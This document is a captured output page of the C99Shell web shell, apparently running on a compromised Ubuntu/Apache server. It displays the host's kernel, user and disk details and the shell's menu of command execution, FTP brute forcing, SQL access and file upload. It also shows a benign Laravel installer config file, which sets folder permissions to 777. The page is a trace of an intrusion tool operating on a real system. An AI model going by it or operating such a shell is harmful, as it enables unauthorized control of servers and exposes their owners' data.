!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/main_file/config/   drwxrwxr-x
Free 13.1 GB of 57.97 GB (22.59%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     installer.php (5.24 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

return [

    
/*
    |--------------------------------------------------------------------------
    | Server Requirements
    |--------------------------------------------------------------------------
    |
    | This is the default Laravel server requirements, you can add as many
    | as your application require, we check if the extension is enabled
    | by looping through the array and run "extension_loaded" on it.
    |
    */
    
'core' => [
        
'minPhpVersion' => '8.1',
    ],
    
'final' => [
        
'key' => true,
        
'publish' => false,
    ],
    
'requirements' => [
        
'php' => [
            
'openssl',
            
'pdo',
            
'mbstring',
            
'tokenizer',
            
'JSON',
            
'cURL',
        ],
        
'apache' => [
            
'mod_rewrite',
        ],
    ],

    
/*
    |--------------------------------------------------------------------------
    | Folders Permissions
    |--------------------------------------------------------------------------
    |
    | This is the default Laravel folders permissions, if your application
    | requires more permissions just add them to the array list bellow.
    |
    */
    
'permissions' => [
        
'storage/' => '777',
        
'storage/framework/' => '777',
        
'storage/logs/' => '777',
        
'storage/uploads/' => '777',
        
'bootstrap/cache/' => '777',
        
'resources/lang/' => '777',
    ],

    
/*
    |--------------------------------------------------------------------------
    | Environment Form Wizard Validation Rules & Messages
    |--------------------------------------------------------------------------
    |
    | This are the default form field validation rules. Available Rules:
    | https://laravel.com/docs/5.4/validation#available-validation-rules
    |
    */
    
'environment' => [
        
'form' => [
            
'rules' => [
                
'app_name'              => 'required|string|max:50',
                
'environment'           => 'required|string|max:50',
                
'environment_custom'    => 'required_if:environment,other|max:50',
                
'app_debug'             => 'required|string',
                
'app_log_level'         => 'required|string|max:50',
                
'app_url'               => 'required|url',
                
'database_connection'   => 'required|string|max:50',
                
'database_hostname'     => 'required|string|max:50',
                
'database_port'         => 'required|numeric',
                
'database_name'         => 'required|string|max:50',
                
'database_username'     => 'required|string|max:50',
                
'database_password'     => 'nullable|string|max:50',
                
'broadcast_driver'      => 'required|string|max:50',
                
'cache_driver'          => 'required|string|max:50',
                
'session_driver'        => 'required|string|max:50',
                
'queue_driver'          => 'required|string|max:50',
                
'redis_hostname'        => 'required|string|max:50',
                
'redis_password'        => 'required|string|max:50',
                
'redis_port'            => 'required|numeric',
                
'mail_driver'           => 'required|string|max:50',
                
'mail_host'             => 'required|string|max:50',
                
'mail_port'             => 'required|string|max:50',
                
'mail_username'         => 'required|string|max:50',
                
'mail_password'         => 'required|string|max:50',
                
'mail_encryption'       => 'required|string|max:50',
                
'pusher_app_id'         => 'max:50',
                
'pusher_app_key'        => 'max:50',
                
'pusher_app_secret'     => 'max:50',
            ],
        ],
    ],

    
/*
    |--------------------------------------------------------------------------
    | Installed Middleware Options
    |--------------------------------------------------------------------------
    | Different available status switch configuration for the
    | canInstall middleware located in `canInstall.php`.
    |
    */
    
'installed' => [
        
'redirectOptions' => [
            
'route' => [
                
'name' => 'welcome',
                
'data' => [],
            ],
            
'abort' => [
                
'type' => '404',
            ],
            
'dump' => [
                
'data' => 'Dumping a not found message.',
            ],
        ],
    ],

    
/*
    |--------------------------------------------------------------------------
    | Selected Installed Middleware Option
    |--------------------------------------------------------------------------
    | The selected option fo what happens when an installer instance has been
    | Default output is to `/resources/views/error/404.blade.php` if none.
    | The available middleware options include:
    | route, abort, dump, 404, default, ''
    |
    */
    
'installedAlreadyAction' => '',

    
/*
    |--------------------------------------------------------------------------
    | Updater Enabled
    |--------------------------------------------------------------------------
    | Can the application run the '/update' route with the migrations.
    | The default option is set to False if none is present.
    | Boolean value
    |
    */
    
'updaterEnabled' => 'true',

];

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0054 ]--